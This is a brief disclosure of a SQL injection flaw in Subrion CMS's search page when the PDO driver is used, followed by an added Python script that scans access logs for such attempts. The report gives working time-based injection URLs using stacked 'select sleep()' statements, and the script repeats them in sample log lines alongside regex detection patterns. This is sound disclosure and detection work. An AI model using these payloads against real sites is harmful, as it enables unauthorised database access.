I. Vulnerability Analysis
Subrion CMS supports three ways of connecting to MySQL: mysql, mysqli and PDO. The default is mysqli.
They are executed by three files in the /includes/classes/ directory.
ia.core.mysql.php
ia.core.mysqli.php
ia.core.pdo.php
If a website uses the PDO connection, there will be a vulnerability.
II. Vulnerability testing
Using PDO connections requires modifying the file /includes/config.inc.php.
Change mysqli to pdo.
In the search page:
http://cms.im/search/
POC and testing:
/search/?q=);select%20sleep(1);--+
/search/?q=);select%20sleep(5);--+
/search/?q=);select%20sleep(10);--+
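
For defenders reviewing web server logs of a site that ran the PDO driver, the following added example (not part of the original report and not Subrion code) decodes the `q` parameter of requests to /search/ and flags values that carry a second SQL statement or a timing function. The log format, the sample lines and the keyword lists are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not taken from the report).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search/?q=subrion+templates HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search/?q=);select%20sleep(5);--+ HTTP/1.1" 200 5090
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search/?q=%29%3BSELECT%20SLEEP%2810%29%3B--%20 HTTP/1.1" 200 5090
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /search/?q=c%3B+c%2B%2B+select+statement HTTP/1.1" 200 4801
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Assumed heuristics: a statement terminator followed by a SQL verb, or a timing call.
STACKED = re.compile(r";\s*(?:select|insert|update|delete|drop|alter|create)\b", re.I)
TIMING = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)


def search_terms(target):
    """Yield decoded values of the q parameter for requests to /search/."""
    parts = urlsplit(target)
    if not parts.path.startswith("/search"):
        return
    # Split on '&' only: ';' must stay inside the value, it is the signal we look for.
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "q":
            yield unquote_plus(value)


def find_suspicious(log_text):
    """Return (client, decoded q, reasons) for search requests that look like injected SQL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        for term in search_terms(target):
            reasons = [name for name, rx in (("stacked-statement", STACKED),
                                             ("timing-function", TIMING)) if rx.search(term)]
            if reasons:
                hits.append((client, term, reasons))
    return hits


if __name__ == "__main__":
    for client, term, reasons in find_suspicious(SAMPLE_LOG):
        print(client, repr(term), ",".join(reasons))
```

Matching on the decoded value catches the percent-encoded form of the same request; correlating hits with response times in the same log helps confirm whether the statement actually executed.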